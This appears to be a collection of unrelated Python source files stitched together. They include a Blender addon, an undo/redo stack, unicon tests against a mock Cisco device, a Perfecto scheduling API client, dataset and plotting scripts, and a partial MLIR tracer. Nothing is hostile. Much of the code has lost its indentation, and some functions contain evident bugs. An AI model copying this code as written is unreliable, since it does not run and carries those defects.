except StatementNotFound as e:
raise ParseError("Statement not found", pc) from e
except StatementNotAllowed as e:
raise ParseError("Statement not allowed", pc) from e
except UnexpectedClosingFound as e:
raise ParseError("Unexpected closing statement found", pc) from e
node = klass(main, expr, parent=parent)
pc.node = node
end = node.compile(pc, end)
# No node is inserted, it purely returns body
return node, end
|
import bpy
from bpy.props import *
from .PesFacemod.PesFacemod import *
import bpy.utils.previews
bl_info = {
"name": "PES2020 Facemod",
"version": (1, 80, 0),
"blender": (2, 80, 0),
"location": "Under Scene Tab",
"description": "Unpacks and packs face.fpk files for modification",
"warning": "Saving your .blend file won't work, you must pack everything and start again. Backup your files.",
"wiki_url": "",
"tracker_url": "",
"category": "System"
}
classes = (
ListItem,
PANEL_PT_file_properties,
FMDL_UL_strings,
PANEL_PT_string_properties,
OBJECT_OT_face_hair_modifier
)
def register():
for cls in classes:
bpy.utils.register_class(cls)
pcoll = bpy.utils.previews.new()
my_icons_dir = os.path.join(os.path.dirname(__file__))
# load a preview thumbnail of a file and store in the previews collection
print("Loading ", os.path.join(my_icons_dir, "icon.png"))
pcoll.load("fhm_icon", os.path.join(my_icons_dir, "icon.png"), 'IMAGE')
preview_collections["main"] = pcoll
bpy.types.Object.fmdl_strings = CollectionProperty(type=ListItem)
bpy.types.Object.list_index = IntProperty(name="Index for fmdl_strings", default=0)
def unregister():
for cls in reversed(classes):
bpy.utils.unregister_class(cls)
for pcoll in preview_collections.values():
bpy.utils.previews.remove(pcoll)
preview_collections.clear()
if __name__ == "__main__":
register()
|
import time
class EditCommand:
"undo/redo-able representation of an art edit (eg paint, erase) operation"
def __init__(self, art):
self.art = art
self.start_time = art.app.get_elapsed_time()
self.finish_time = None
# nested dictionary with frame(layer(column(row))) structure -
# this prevents multiple commands operating on the same tile
# from stomping each other
self.tile_commands = {}
def get_number_of_commands(self):
commands = 0
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile in column.values():
commands += 1
return commands
def __str__(self):
# get unique-ish ID from memory address
addr = self.__repr__()
addr = addr[addr.find('0'):-1]
s = 'EditCommand_%s: %s tiles, time %s' % (addr, self.get_number_of_commands(),
self.finish_time)
return s
def add_command_tiles(self, new_command_tiles):
for ct in new_command_tiles:
# create new tables for frames/layers/columns if not present
if not ct.frame in self.tile_commands:
self.tile_commands[ct.frame] = {}
if not ct.layer in self.tile_commands[ct.frame]:
self.tile_commands[ct.frame][ct.layer] = {}
if not ct.y in self.tile_commands[ct.frame][ct.layer]:
self.tile_commands[ct.frame][ct.layer][ct.y] = {}
# preserve "before" state of any command we overwrite
if ct.x in self.tile_commands[ct.frame][ct.layer][ct.y]:
old_ct = self.tile_commands[ct.frame][ct.layer][ct.y][ct.x]
ct.set_before(old_ct.b_char, old_ct.b_fg, old_ct.b_bg,
old_ct.b_xform)
self.tile_commands[ct.frame][ct.layer][ct.y][ct.x] = ct
def undo_commands_for_tile(self, frame, layer, x, y):
# tile might not have undo commands, eg text entry beyond start region
if not y in self.tile_commands[frame][layer] or \
not x in self.tile_commands[frame][layer][y]:
return
self.tile_commands[frame][layer][y][x].undo()
def undo(self):
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile_command in column.values():
tile_command.undo()
def apply(self):
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile_command in column.values():
tile_command.apply()
class EntireArtCommand:
"""
undo/redo-able representation of a whole-art operation, eg:
resize/crop, run art script, add/remove layer, etc
"""
# art arrays to grab
array_types = ['chars', 'fg_colors', 'bg_colors', 'uv_mods']
def __init__(self, art, origin_x=0, origin_y=0):
self.art = art
# remember origin of resize command
self.origin_x, self.origin_y = origin_x, origin_y
self.before_frame = art.active_frame
self.before_layer = art.active_layer
self.start_time = self.finish_time = art.app.get_elapsed_time()
def save_tiles(self, before=True):
# save copies of tile data lists
prefix = 'b' if before else 'a'
for atype in self.array_types:
# save list as eg "b_chars" for "character data before operation"
src_data = getattr(self.art, atype)
var_name = '%s_%s' % (prefix, atype)
# deep copy each frame's data, else before == after
new_data = []
for frame in src_data:
new_data.append(frame.copy())
setattr(self, var_name, new_data)
if before:
self.before_size = (self.art.width, self.art.height)
else:
self.after_size = (self.art.width, self.art.height)
def undo(self):
# undo might remove frames/layers that were added
self.art.set_active_frame(self.before_frame)
self.art.set_active_layer(self.before_layer)
if self.before_size != self.after_size:
x, y = self.before_size
self.art.resize(x, y, self.origin_x, self.origin_y)
for atype in self.array_types:
new_data = getattr(self, 'b_' + atype)
setattr(self.art, atype, new_data[:])
if self.before_size != self.after_size:
# Art.resize will set geo_changed and mark all frames changed
self.art.app.ui.adjust_for_art_resize(self.art)
self.art.mark_all_frames_changed()
def apply(self):
if self.before_size != self.after_size:
x, y = self.after_size
self.art.resize(x, y, self.origin_x, self.origin_y)
for atype in self.array_types:
new_data = getattr(self, 'a_' + atype)
setattr(self.art, atype, new_data[:])
if self.before_size != self.after_size:
self.art.app.ui.adjust_for_art_resize(self.art)
self.art.mark_all_frames_changed()
class EditCommandTile:
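    "undo/redo-able change to a single tile: stores before (b_*) and after (a_*) char/fg/bg/xform state"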
def __init__(self, art):
self.art = art
self.creation_time = self.art.app.get_elapsed_time()
# initialize everything
# previously did 'string list of serialized items' + setattr
# which made prettier code but was slower
self.frame = self.layer = self.x = self.y = None
self.b_char = self.b_fg = self.b_bg = self.b_xform = None
self.a_char = self.a_fg = self.a_bg = self.a_xform = None
def __str__(self):
s = 'F%s L%s %s,%s @ %.2f: ' % (self.frame, self.layer, str(self.x).rjust(2, '0'), str(self.y).rjust(2, '0'), self.creation_time)
s += 'c%s f%s b%s x%s -> ' % (self.b_char, self.b_fg, self.b_bg, self.b_xform)
s += 'c%s f%s b%s x%s' % (self.a_char, self.a_fg, self.a_bg, self.a_xform)
return s
def __eq__(self, value):
return self.frame == value.frame and self.layer == value.layer and \
self.x == value.x and self.y == value.y and \
self.b_char == value.b_char and self.b_fg == value.b_fg and \
self.b_bg == value.b_bg and self.b_xform == value.b_xform and \
self.a_char == value.a_char and self.a_fg == value.a_fg and \
self.a_bg == value.a_bg and self.a_xform == value.a_xform
def copy(self):
"returns a deep copy of this tile command"
new_ect = EditCommandTile(self.art)
# TODO: old or new timestamp? does it matter?
#new_ect.creation_time = self.art.app.get_elapsed_time()
new_ect.creation_time = self.creation_time
# copy all properties
new_ect.frame, new_ect.layer = self.frame, self.layer
new_ect.x, new_ect.y = self.x, self.y
new_ect.b_char, new_ect.b_xform = self.b_char, self.b_xform
new_ect.b_fg, new_ect.b_bg = self.b_fg, self.b_bg
new_ect.a_char, new_ect.a_xform = self.a_char, self.a_xform
new_ect.a_fg, new_ect.a_bg = self.a_fg, self.a_bg
return new_ect
def set_tile(self, frame, layer, x, y):
self.frame, self.layer = frame, layer
self.x, self.y = x, y
def set_before(self, char, fg, bg, xform):
self.b_char, self.b_xform = char, xform
self.b_fg, self.b_bg = fg, bg
def set_after(self, char, fg, bg, xform):
self.a_char, self.a_xform = char, xform
self.a_fg, self.a_bg = fg, bg
def is_null(self):
return self.a_char == self.b_char and self.a_fg == self.b_fg and self.a_bg == self.b_bg and self.a_xform == self.b_xform
def undo(self):
# tile's frame or layer may have been deleted
if self.layer > self.art.layers - 1 or self.frame > self.art.frames - 1:
return
if self.x >= self.art.width or self.y >= self.art.height:
return
tool = self.art.app.ui.selected_tool
        set_all = tool.affects_char and tool.affects_fg_color and tool.affects_bg_color and tool.affects_xform
self.art.set_tile_at(self.frame, self.layer, self.x, self.y,
self.b_char, self.b_fg, self.b_bg, self.b_xform, set_all)
def apply(self):
tool = self.art.app.ui.selected_tool
        set_all = tool.affects_char and tool.affects_fg_color and tool.affects_bg_color and tool.affects_xform
self.art.set_tile_at(self.frame, self.layer, self.x, self.y,
self.a_char, self.a_fg, self.a_bg, self.a_xform, set_all)
class CommandStack:
def __init__(self, art):
self.art = art
self.undo_commands, self.redo_commands = [], []
def __str__(self):
s = 'stack for %s:\n' % self.art.filename
s += '===\nundo:\n'
for cmd in self.undo_commands:
s += str(cmd) + '\n'
s += '\n===\nredo:\n'
for cmd in self.redo_commands:
s += str(cmd) + '\n'
return s
def commit_commands(self, new_commands):
self.undo_commands += new_commands[:]
self.clear_redo()
def undo(self):
if len(self.undo_commands) == 0:
return
command = self.undo_commands.pop()
self.art.app.cursor.undo_preview_edits()
command.undo()
self.redo_commands.append(command)
self.art.app.cursor.update_cursor_preview()
def redo(self):
if len(self.redo_commands) == 0:
return
command = self.redo_commands.pop()
        # un-apply cursor preview before applying redo, else preview edits
        # will "stick"
self.art.app.cursor.undo_preview_edits()
command.apply()
# add to end of undo stack
self.undo_commands.append(command)
self.art.app.cursor.update_cursor_preview()
def clear_redo(self):
self.redo_commands = []
|
# Some python class related homework
import math
class Point:
"""Two values"""
def __init__(self, *args):
if len(args) == 2:
            if all(isinstance(a, float) for a in args):
self.x = args[0]
self.y = args[1]
elif len(args) == 1:
if type(args[0]) == Point:
self.x = args[0].x
self.y = args[0].y
else:
self.x = 0.0
self.y = 0.0
class Line:
"""Two points"""
def __init__(self, a, b):
self.a = a
self.b = b
def distance(self):
return (((self.b.x - self.a.x) ** 2.0) + ((self.b.y - self.a.y) ** 2.0)) ** 0.5
a = Point()
b = Point(0.0, 1.0)
c = Point(b)
l = Line(a, c)
print(l.distance())
|
"""
Unittests for fxos/ftd plugin
Uses the unicon.mock.mock_device script to test the plugin.
"""
__author__ = "dwapstra"
import unittest
from unicon import Connection
from unicon.eal.dialogs import Dialog
from unicon.plugins.generic.statements import GenericStatements
generic_statements = GenericStatements()
password_stmt = generic_statements.password_stmt
escape_char_stmt = generic_statements.escape_char_stmt
class TestFxosFtdPlugin(unittest.TestCase):
def test_connect(self):
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state fxos_connect'],
os='fxos',
series='ftd',
credentials=dict(default=dict(username='cisco', password='cisco')))
c.connect()
self.assertEqual(c.spawn.match.match_output, '\r\nFirepower# ')
return c
def test_execute_scope(self):
c = self.test_connect()
c.switchto('chassis scope /system/services')
r = c.execute(['create ntp-server 192.168.200.101', 'commit-buffer'])
self.assertEqual(r, {'commit-buffer': '', 'create ntp-server 192.168.200.101': ''})
self.assertEqual(c.spawn.match.match_output, 'commit-buffer\r\nFirepower /system/services # ')
def test_execute_scope2(self):
c = self.test_connect()
c.execute(['scope service-profile'], allow_state_change=True)
def test_are_you_sure_stmt(self):
c = self.test_connect()
c.execute(['scope security', 'clear-user-sessions all'], allow_state_change=True)
def test_console_execute(self):
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state chassis_exec'],
os='fxos',
series='ftd',
credentials=dict(
default=dict(username='cisco', password='cisco', line_password='cisco'),
sudo=dict(password='cisco')))
c.connect()
c.spawn.timeout = 30
c.switchto('ftd expert', timeout=60)
c.execute(['sudo su -'],
reply=Dialog([password_stmt, escape_char_stmt]),
allow_state_change=True)
def test_switchto_states(self):
states = [
'chassis',
'chassis scope /system',
'fxos',
'local-mgmt',
'cimc',
'cimc 1',
'module console',
'module 1 console',
'ftd console',
'ftd expert',
'ftd expert root'
]
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state fxos_exec'],
os='fxos',
series='ftd',
credentials=dict(
default=dict(username='cisco', password='cisco', line_password='cisco'),
sudo=dict(password='cisco')))
c.connect()
for state in states:
c.switchto(state)
if __name__ == "__main__":
unittest.main()
|
from factory import Sequence, SubFactory
from factory.django import DjangoModelFactory
from documentation.models import Map, Block, IDE, Category
class MapFactory(DjangoModelFactory):
class Meta:
model = Map
title = Sequence(lambda n: "Concept %03d" % n)
slug = Sequence(lambda n: "/concepts/%03d" % n)
class BlockFactory(DjangoModelFactory):
class Meta:
model = Block
title = Sequence(lambda n: "Block %03d" % n)
slug = Sequence(lambda n: "%03d" % n)
parent_ide = SubFactory('documentation.factories.IDEFactory')
parent = parent_ide
class IDEFactory(DjangoModelFactory):
class Meta:
model = IDE
title = Sequence(lambda n: "IDE %03d" % n)
slug = Sequence(lambda n: "%03d" % n)
class CategoryFactory(DjangoModelFactory):
class Meta:
model = Category
name = Sequence(lambda n: "Category %03d" % n)
parent_ide = SubFactory('documentation.factories.IDEFactory')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, generators, division, absolute_import, with_statement, print_function
from .__init__ import APIBase, log
from urllib import urlencode
class Scheduler(APIBase):
"""Scheduling operations
Extends:
APIBase
"""
def __init__(self, securityToken, baseURL='https://mobilecloud.perfectomobile.com/services/'):
"""construct class
Arguments:
securityToken {string} -- security token generated through the perfecto console
Keyword Arguments:
baseURL {str} -- Base url for the web services. (default: {'https://mobilecloud.perfectomobile.com/services/'})
"""
self.initClient(securityToken, baseURL)
def createSchedule(self, scheduleKey, recurrence, scriptKey,
status=None, owner=None, startTime=None,
endTime=None, repeatCount=None, description=None,
responseFormat="json", admin=False, *parameters, **securedParams):
"""Creates a new scheduled execution. It is possible to request a status message via email or SMS indicating whether the script ran successfully.
Users can create up to 20 scheduled executions.
Every scheduled execution name must be unique. You cannot use the same scheduled execution name more than once
Arguments:
scheduleKey {string} -- Format is: visibility:<scheduled execution_name>
visibility values: PUBLIC, PRIVATE, GROUP.
The default visibility is PRIVATE.
PRIVATE – the scheduled execution can be viewed by the owner only.
GROUP – the scheduled execution can be viewed by everyone in the owner's group.
PUBLIC – the scheduled execution can be viewed by every user.
execution_name is supplied by the user.
The scheduled execution can be updated by its owner and by automation
administrators.
recurrence {string} -- Cron expression.
The Cron expression maker can be used for creating Cron expressions.
Cron expression limitations
                                   It is not possible to run a script every second.
In the second and minute expressions " *" is not allowed.
Note: The Cron expression is reset every round hour/day.
For example, if a schedule is executed every 20 minutes, starting 10
                                   minutes after the top of the hour, in the first hour the script
will run at x:30, x:50, and in the next hour it will run
at x:30, x:50 again.
            scriptKey {string} -- The repository key of the automation script file to run.
                                  Format is: visibility:<script_name>, for example PRIVATE:executeScript.xml.
                                  visibility values: PUBLIC, PRIVATE, GROUP.
                                  The default visibility is PRIVATE.
            *parameters {List[Tuple[string, string]]} -- additional script parameters, sent as param.<name>=<value>
            **securedParams {dict[string, string]} -- secured script parameters, sent as securedParam.<name>=<value>
Keyword Arguments:
status {string} -- Available values: ACTIVE, INACTIVE (default: {None})
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter to allow
administrators to perform operations on scheduled executions of other users.
If a user with administrative credentials wants to create a scheduled
executions of user "User", specify the parameters as
admin=true and owner=User. (default: {None})
startTime {long} -- When the scheduled execution will start. In UTC milliseconds. (default: {None})
endTime {long} -- When the scheduled execution will end. In UTC milliseconds. (default: {None})
repeatCount {int} -- The number of times the scheduled execution will be executed. (default: {None})
description {string} -- The description of the scheduled execution (free text). (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative credentials to create schedules
for users in their group. (default: {False})
"""
if not scheduleKey or not recurrence or not scriptKey:
raise Exception("scheduleKey, recurrence, and scriptKey are required parameters and the values are wrong.")
uriStr = "/schedules?operation=create"
params = {}
rslt = None
if status:
params["status"] = status
if owner:
params["owner"] = owner
if startTime:
params["startTime"] = startTime
if endTime:
params["endTime"] = endTime
if repeatCount:
params["repeatCount"] = repeatCount
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
params["scheduleKey"] = scheduleKey
params["recurrence"] = recurrence
params["scriptKey"] = scriptKey
if parameters:
params.update({("param.%s" % k, v) for (k, v) in parameters})
if securedParams:
params.update({("securedParam.%s" % k, v) for (k, v) in securedParams})
        uriStr += "&" + urlencode(params)
log.debug("parameters are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("createSchedule API failed because '%s'" % e.message)
raise Exception("create schedule API call failed because '%s'" % e.message)
return rslt
    def getScheduledExecutions(self, owner=None, responseFormat="json", admin=False):
        """Returns a list of scheduled executions.
It is possible to return all scheduled executions,
scheduled executions according to visibility:
private, public, group, or single scheduled executions.
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin
parameter to allow administrators to perform operations
on scheduled executions of other users. If a user with
administrative credentials wants to get a list of scheduled
executions of user "User", specify the parameters as
admin=true and owner=User. (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative
credentials to create schedules for
users in their group. (default: {False})
"""
uriStr = "/schedules?operation=list"
params = {}
rslt = None
if owner:
params["owner"] = owner
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
        uriStr += "&" + urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("getScheduledExecutions API call failed because '%s'", e.message)
raise Exception("list scheduled executions API call failed because '%s'" % e.message)
return rslt
def getExecutionInfo(self, scheduleKey, owner=None, responseFormat="json", admin=False):
"""Retrieves information about the scheduled execution.
It is possible to retrieve information on any scheduled
execution regardless if it was defined as private,
public, or group.
Arguments:
scheduleKey {string} -- scheduleKey for a scheduled execution
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter
to allow administrators to perform operations on scheduled
executions of other users. If a user with administrative
credentials wants to get information for a scheduled execution
of user "User", specify the parameters as admin=true and
owner=User. (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative
credentials to create schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("scheduleKey is a required parameter and the data is invalid.")
uriStr = "/schedules/%s?operation=info" % scheduleKey
rslt = None
params = {}
if owner:
params["owner"] = owner
params["responseFormat"] = responseFormat
if admin:
params["admin"] = admin
        uriStr += "&" + urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("getExecutionInfo API call failed because '%s'" % e.message)
raise Exception("Excecution info API call failed because '%s'" % e.message)
return rslt
def deleteScheduledExecution(self, scheduleKey, owner=None, responseFormat='json', admin=False):
"""Deletes an existing scheduled execution, specified by the scheduleKey
Arguments:
scheduleKey {string} -- schedule ID to update
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter
to allow administrators to perform operations on scheduled
executions of other users. If a user with administrative
credentials wants to delete a scheduled execution of user
"User", specify the parameters as admin=true and owner=User.
(default: {None})
responseFormat {str} -- Available values: JSON, XML (default: {'json'})
admin {bool} -- true to allow users with administrative credentials to create
schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("scheduleKey is a required parameter and the data is invalid.")
uriStr = "/schedules/%s?operation=delete" % scheduleKey
rslt = None
params = {}
if owner:
params["owner"]
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
        uriStr += "&" + urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("deleteScheduledExecution API call failed because '%s'" % e.message)
raise Exception("delete scheduled execution failed because '%s'" % e.message)
return rslt
def updateScheduledExecution(self, scheduleKey, owner=None, recurrence=None,
startTime=None, endTime=None, repeateCount=None,
scriptKey=None, description=None, responseFormat='json',
admin=False, *parameters, **securedParams):
"""Updates an existing scheduled execution.
Changes the value of any provided parameter value. Parameters not included
remain unchanged.
Arguments:
scheduleKey {string} -- the key for the schedule to modify
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin
parameter to allow administrators to perform operations on
scheduled executions of other users. If a user with
administrative credentials wants to update a scheduled
execution of user "User", specify the parameters
                                  as admin=true and owner=User. (default: {None})
recurrence {string} -- Cron expression.
See notes in Create operation Parameters
list
https://developers.perfectomobile.com/display/PD/Create+Scheduled+Execution
(default: {None})
startTime {long} -- When the scheduled execution will start. In Unix/Epoch system
time format (default: {None})
endTime {long} -- When the scheduled execution will end. In Unix/Epoch system
time format (default: {None})
repeateCount {int} -- The number of times the scheduled execution will be executed. (default: {None})
scriptKey {string} -- The repository key of the automation script file. For example,
Private:executeScript.xml (default: {None})
description {string} -- The description of the scheduled execution (free text).
(default: {None})
responseFormat {str} -- Available values: json, xml (default: {'json'})
admin {bool} -- true to allow users with administrative credentials to create
schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("schedule key is required and is invalid.")
uriStr = "/schedules/%s?operation=update" % scheduleKey
rslt = None
params = {}
if parameters:
params.update({("param.%s" % k, v) for (k, v) in parameters})
if securedParams:
params.update({("securedParam.%s" % k, v) for (k, v) in securedParams})
if owner:
params["owner"] = owner
if recurrence:
params["recurrence"] = recurrence
if startTime:
params["startTime"] = startTime
if endTime:
params["endTime"] = endTime
if repeateCount:
params["repeateCount"] = repeateCount
if scriptKey:
params["scriptKey"] = scriptKey
if description:
params["description"] = description
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
        uriStr += "&" + urlencode(params)
log.debug("parameters are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("updateScheduledExecution API call failed because '%s'" % e.message)
raise Exception("update scheduled execution API call failed because '%s'" % e.message)
return rslt
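# Hedged usage sketch: the security token, repository keys and cron expression below are
# placeholders rather than real values, and the call goes to the Perfecto cloud configured
# in baseURL. The function is illustrative only and is not called anywhere in this module.
def _example_create_schedule():
    scheduler = Scheduler(securityToken='YOUR_SECURITY_TOKEN')
    return scheduler.createSchedule(
        scheduleKey='PRIVATE:nightly_regression',
        recurrence='0 0 2 * * ?',
        scriptKey='PRIVATE:regression.xml',
        description='Nightly regression run')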
|
import requests
#get list of connections
def get_connections(URL,PARAMS):
try:
r = requests.get(url=URL,params=PARAMS)
get_result = r.json()["results"]
connection_dict = {}
for connection in get_result:
their_did = connection["their_did"]
connection_id = connection["connection_id"]
connection_dict[their_did] = connection_id
    except Exception:
connection_dict = {}
return connection_dict
#get list of schemas created
def get_schemas(URL,PARAMS):
try:
r = requests.get(url=URL, params=PARAMS)
data = r.json()["schema_ids"]
    except Exception:
data = {}
return data
#get created credential definitions
def get_credential_definitions(URL,PARAMS):
try:
r = requests.get(url=URL, params=PARAMS)
data = r.json()["credential_definition_ids"]
    except Exception:
data = {}
return data
#get a user's verkey for a given DID
def get_verkeys(URL,DID):
r = requests.get(url=URL,params=DID)
data = r.json()["verkey"]
return data
#get json
def get_json(URL,json_object):
r = requests.get(url=URL,json=json_object)
data = r.json()
return data
#handle post json
def handle_json(URL,json_object):
r = requests.post(url=URL,json=json_object)
data = r.json()
return data
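if __name__ == '__main__':
    # Hedged usage sketch: the admin URL below is a common local default for an
    # ACA-Py style agent and is purely illustrative; point it at the agent that is
    # actually being queried.
    ADMIN_URL = 'http://localhost:8021'
    connections = get_connections(ADMIN_URL + '/connections', {})
    schemas = get_schemas(ADMIN_URL + '/schemas/created', {})
    print(connections, schemas)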
|
from datasets.Loader import register_dataset
from datasets.Mapillary.MapillaryLike_instance import MapillaryLikeInstanceDataset
from datasets.util.Util import username
DEFAULT_PATH = "C:/Users/Tunar Mahmudov/Desktop/TrackR-CNN/data/KITTI_MOTS"
NAME = "KITTI_instance"
@register_dataset(NAME)
class KittiInstanceDataset(MapillaryLikeInstanceDataset):
def __init__(self, config, subset):
super().__init__(config, subset, NAME, DEFAULT_PATH, "datasets/KITTI/official", 256,
cat_ids_to_use=list(range(24, 34)))
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
fname = 'model_train.log'
print('Reading:', fname)
df = pd.read_csv(fname)
epoch = df['epoch'].values + 1
loss = df['loss'].values
val_loss = df['val_loss'].values
print('epochs: %8d ... %d' % (np.min(epoch), np.max(epoch)))
print('loss: %.6f ... %.6f' % (np.min(loss), np.max(loss)))
print('val_loss: %.6f ... %.6f' % (np.min(val_loss), np.max(val_loss)))
plt.plot(epoch, loss, label='train loss')
plt.plot(epoch, val_loss, label='validation loss')
plt.xlabel('epoch')
plt.ylabel('mean absolute error (MW m$^{-3}$)')
plt.legend()
plt.grid()
i = np.argmin(val_loss)
min_val_loss = val_loss[i]
min_val_epoch = epoch[i]
print('min_val_loss: %.6f' % min_val_loss)
print('min_val_epoch:', min_val_epoch)
(x_min, x_max) = plt.xlim()
(y_min, y_max) = plt.ylim()
plt.plot([x_min, min_val_epoch], [min_val_loss, min_val_loss], 'k--')
plt.plot([min_val_epoch, min_val_epoch], [0., min_val_loss], 'k--')
plt.xlim(0, x_max)
plt.ylim(0., y_max)
plt.tight_layout()
fname = 'plot_train.png'
print('Writing:', fname)
plt.savefig(fname)
|
import sys,math
N=int(input())
A=input().split()
for i in range(N):
A[i]=int(A[i])
if not(0<=A[i]<=10**9):
print("invalid input")
sys.exit()
M=int(input())
if not((1<=N<=10**6)and(N<=M<=10**9)):
print("invalid input")
sys.exit()
K=math.ceil(sum(A)/M)
print(K)
|
#TA 2 BASE
import pdb
import numpy as np
import gym
from gym import make
import cProfile
import re
import uuid
import os
import random
import time
from utils import rollout
import pickle
#import cv2
import PIL
import torch
import json
import argparse
from collections import OrderedDict
from functools import partial
from torch import Tensor
import torch.multiprocessing as mp
from my_lib import *
from vast.opensetAlgos.EVM import EVM_Training , EVM_Inference, EVM_Inference_simple_cpu
from vast import activations
from statistics import mean
import gc
import csv
import UCCS_TA2_helper
from UCCS_TA2_helper import UCCSTA2
UCCS = UCCSTA2()
try:
torch.multiprocessing.set_sharing_strategy('file_system')
except RuntimeError:
pass
try:
mp.set_start_method('spawn', force=True)
except RuntimeError:
pass
number_of_classes = 2
n_cpu = int(os.cpu_count()*0.8)
SEED = 1
os.environ['PYTHONHASHSEED']=str(SEED)
os.environ['TF_CUDNN_DETERMINISTIC'] = '1'
random.seed(SEED)
np.random.seed(SEED)
#tf.random.set_seed(SEED)
env_to_use = 'CartPole-v0'
print('ENV TO USE', env_to_use)
env = gym.make(env_to_use)
noveltyStdMn = []
state_and_dec = []
X = []; Y = [];
x = env.reset()
numSteps = 0
KLlist = []
currentRunProb = []
def testrun():
UCCS.debug = True
nruns = 6
for k in range(nruns):
actual_state = env.reset()
numSteps = 0
state_and_dec = []
currentRunProb = []
for i in range(200):
# Predict steps
action = UCCS.process_instance(actual_state)
# if(UCCS.debug and UCCS.cnt < 25): print(UCCS.debugstring)
if (UCCS.cnt == 4 and k==2):
env.modify("masspole",.1001)
print("Modified mass pole .1001")
UCCS.given=True
UCCS.trial=1
UCCS.episode=2
elif (UCCS.cnt == 4 and k==3):
env.modify("length",.5001)
env.modify("masspole",.1)
print("Modified Lenth to .50001" )
UCCS.given=True
UCCS.trial=1
UCCS.episode=3
elif (UCCS.cnt == 4 and k==4):
env.modify("length",.5)
env.modify("gravity",9.80001)
print("Modified gravity" )
UCCS.given=True
UCCS.trial=1
UCCS.episode=4
elif (UCCS.cnt == 4 and k==5):
env.modify("length",.5)
env.modify("gravity",9.8)
UCCS.given=False
print("Reutrn to normal")
actual_state, r, done, _ = env.step(action) # Take the predicted best action to get next actual state
if done:
                if(UCCS.cnt < 199): print("!!!!!!!!!!!!!!!!!!!!!Steps only:", UCCS.cnt)
# print (UCCS.problist)
mu = np.mean(UCCS.problist[3:])
sigma = np.std(UCCS.problist[3:])
# print(mu,sigma)
kl = UCCS.kullback_leibler( mu, sigma,UCCS.mean_train, UCCS.stdev_train)
KLlist.append(float(kl))
UCCS.episode += 1
print("Steps, KL/WC",UCCS.cnt,kl, UCCS.world_change_prob())
if(UCCS.given) :
fname = 'Given-History-{}-{}-{}.csv'.format(UCCS.trial,UCCS.episode,uuid.uuid4().hex)
with open(fname, "w", newline="") as f:
writer = csv.writer(f)
writer.writerows(UCCS.statelist)
f.close()
UCCS.cnt=0
UCCS.problist=[]
UCCS.statelist=[]
UCCS.reset(0)
break
# KLlist.append(currentRunProb)
#pdb.set_trace()
cProfile.run('testrun()')
print("mean/stdev KL", np.mean(KLlist),np.std(KLlist))
|
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import re
from typing import Iterable, Optional
import numpy as np
from mlir import ir as _ir
from mlir.dialects import std as std_ops
from npcomp import _cext
from npcomp.dialects import basicpy as basicpy_ops
from npcomp.dialects import numpy as numpy_ops
from ..exporter import *
from ..types import *
from ..compiler.utils.mlir_utils import *
from .context import *
from .emitters import *
class ModuleBuilder:
"""Builds an MLIR module by tracing functions."""
__slots__ = [
"emitters",
"ic",
]
def __init__(self,
mlir_context: Optional[_ir.Context] = None,
emitter_registry=None):
ic = self.ic = ImportContext(mlir_context)
ic.module = _ir.Module.create(loc=ic.loc)
self.emitters = (emitter_registry
if emitter_registry else EmitterRegistry.create_default())
@property
def module(self):
return self.ic.module
def trace(self, *export_py_funcs: ExportPyFunction):
"""Traces exported py functions."""
for export_py_func in export_py_funcs:
assert isinstance(export_py_func, ExportPyFunction), (
"Expected an exported python function (from the Exporter class)")
tracer = FunctionTracer(self, export_py_func)
with tracer:
tracer.trace()
class FunctionTracer(TraceContext):
"""A trace of a single function."""
__slots__ = [
"module_builder",
"epf",
"_args_array_params",
"_f",
"_f_types",
"_ic",
"_python_args",
"_result_array_params",
"_traced_arrays",
"_external_arrays",
]
def __init__(self, module_builder: ModuleBuilder, epf: ExportPyFunction):
super().__init__(desc="[trace of %s]" % epf.__name__)
self.module_builder = module_builder
self.epf = epf
self._traced_arrays = {} # Mapping of TracedArray to current consumer value
self._external_arrays = {} # Mapping of id to (ndarray, ir.Value)
self._validate()
# Alias some parent members for convenience.
self._ic = module_builder.ic
with self._ic.context:
# Extract ArrayParams for all args and results.
self._args_array_params = [
